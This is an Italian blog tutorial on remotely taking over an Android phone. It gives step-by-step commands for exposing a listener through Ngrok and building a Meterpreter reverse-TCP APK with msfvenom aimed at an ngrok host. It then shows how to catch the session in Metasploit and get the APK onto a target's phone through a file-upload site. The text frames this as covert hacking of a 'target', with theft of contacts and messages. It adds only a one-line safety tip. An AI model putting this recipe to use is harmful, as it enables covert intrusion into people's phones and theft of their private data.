Come hackerare Android al di fuori della LAN o del NAT? Vuoi sapere se è possibile fare Hacking Android sulla WAN e nel mondo reale? Questa guida è la risposta alle domande più comuni esempio Hacking Android su WAN poste dai nostri lettori. Bene allora se sei pronto vediamo come hackerare un telefono Android da remoto.
Come hackerare in remoto un telefono Android tramite l’hacking WAN o attraverso Internet
Vediamo quindi come hackerare un telefono Android da remoto tramite Internet. Nel precedente articolo sull’hacking di Android abbiamo imparato i 7 modi comuni per hackerare smartphone Android ma cosa succede se vogliamo accedere a un dispositivo che non è connesso alla nostra rete?
Indice dei contenuti
Di solito in WAN, in primo luogo, è necessario disporre di un IP/nome host statico e, in secondo luogo, è necessario eseguire il port forwarding per consentire la trasmissione del traffico e sappiamo tutti che entrambi sono così difficili in tempo reale poiché abbiamo un accesso limitato a porte in una rete. Quindi, cosa faremo in questo scenario? Semplice creiamo un tunnel sicuro usando Ngrok.
Ngrok è un sistema di proxy inverso di tunneling che stabilisce tunnel dall’endpoint pubblico, ad esempio Internet, a un servizio di rete in esecuzione localmente. Questo può aiutarci a creare un URL HTTP/HTTPS pubblico per un sito Web in esecuzione localmente sulla nostra macchina. Non è necessario eseguire alcun tipo di port forwarding durante l’utilizzo di Ngrok e il nostro servizio di rete alla fine si esporrà a Internet con l’aiuto del tunneling TCP.
Come hackerare un telefono Android da remoto
Naturalmente, quando si parla di un argomento delicato come hackerare un cellulare, ci vogliamo esporre il meno possibile. Ecco perché in tanti cerchiamo un metodo su come hackerare un cellulare a distanza, senza insospettire il nostro bersaglio. Ma senza perdere altro tempo andiamo avanti e vediamo quali passi fare.
Passaggio 01: crea un account su Ngrok per il download
Per prima cosa devi installare Ngrok nella tua macchina Kali. Accendi Kali e naviga su Ngrok per accedere al suo sito Web ufficiale: https://ngrok.com/.
Devi prima creare un account. Vai all’opzione di registrazione e compila tutti i campi necessari. (ATTENZIONE: non utilizzare la tua e-mail di lavoro o un’e-mail che ha accesso alle tue informazioni private.
È consigliabile utilizzare e-mail temporanee durante l’esecuzione di test di penetrazione. Puoi anche utilizzare https://temp-mail.org/en/ per creare il tuo account). Dopo esserti registrato, puoi scaricare il programma di installazione di ngrok per Linux.
Passaggio 02: decomprimere il file scaricato
Vai alla directory di download in cui risiede il file scaricato. Devi decomprimere questo file. Utilizzare il comando unzip per estrarre il file.
Passaggio 03: copia il token, dato al tuo account
Dopo aver decompresso, devi salvare il token che è stato dato al tuo account. Copia il token da qui e incollalo nel tuo terminale. Assicurati di incollare il token nella stessa directory in cui hai ngrok. Sei pronto per utilizzare questo strumento. Digita nel terminale:
# ./ngrok tcp [Porta n.:] (scegliere qualsiasi numero di porta su cui si desidera associare una connessione)
L’inoltro qui specifica il tunnel TCP che ngrok ha creato. La connessione è associata a localhost sulla porta 4242. Ora dobbiamo generare un payload dannoso utilizzando msfvenom.
Passaggio 04: genera un payload utilizzando msfvenom
A questo punto digita il comando:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10900 R > /root/Desktop/android.apk
Passaggio 05: avviare il gestore TCP inverso
Avvia il framework Metasploit. Imposta exploit come multi/handler, Lhost come localhost cioè 0.0.0.0, Lport come 4242 ed esegui exploit.
Passaggio 06: scarica il payload sul tuo telefono Android per ottenere una sessione meterpreter
Per scaricare questo payload sul dispositivo Android, lo caricheremo su www.upload.ee , un sito web molto utile per caricare i tuoi file in modo sicuro e anonimo.
Sfoglia questo link sul tuo telefono Android, scaricherà il file zip del nostro payload. Decomprimilo e installalo nel tuo telefono. (consenti l’opzione per installarlo da fonti di terze parti)
Dopo aver installato ed eseguito l’app dal mio telefono Android, ho avuto una sessione nella mia macchina d’attacco Kali.
È così che puoi effettivamente sfruttare un telefono Android e ottenere l’accesso remoto su Internet anziché sulla tua rete locale. Dopo aver ottenuto una sessione, sai che un utente malintenzionato può facilmente ottenere le tue informazioni, rubare i tuoi contatti, messaggi, dati delle app e molto altro. Quindi, ottenere l’accesso al tuo telefono è molto più facile quando non sei consapevole.
Questo exploit è testato su Android versione 9.0, che non è una versione vecchia e attualmente in uso da molti utenti. Un consiglio salutare per proteggere il tuo dispositivo Android è quello di non installare alcuna applicazione da una fonte sconosciuta, anche se vuoi davvero installarla, prova a leggere ed esaminare il suo codice sorgente per avere un’idea se questo file è dannoso o meno.
Note finali
E siamo arrivati alle note finali di questa guida come hackerare un telefono Android da remoto. Prima di salutare volevo informarti che mi trovi anche sui Social Network, per entrarci clicca sulle icone appropriate che trovi nella Home di questo blog, inoltre se la guida ti è piaciuta condividila pure attraverso i pulsanti social di Facebook, Twitter, Pinterest e Tumblr, per far conoscere il blog anche ai tuoi amici, ecco con questo è tutto Wiz ti saluta.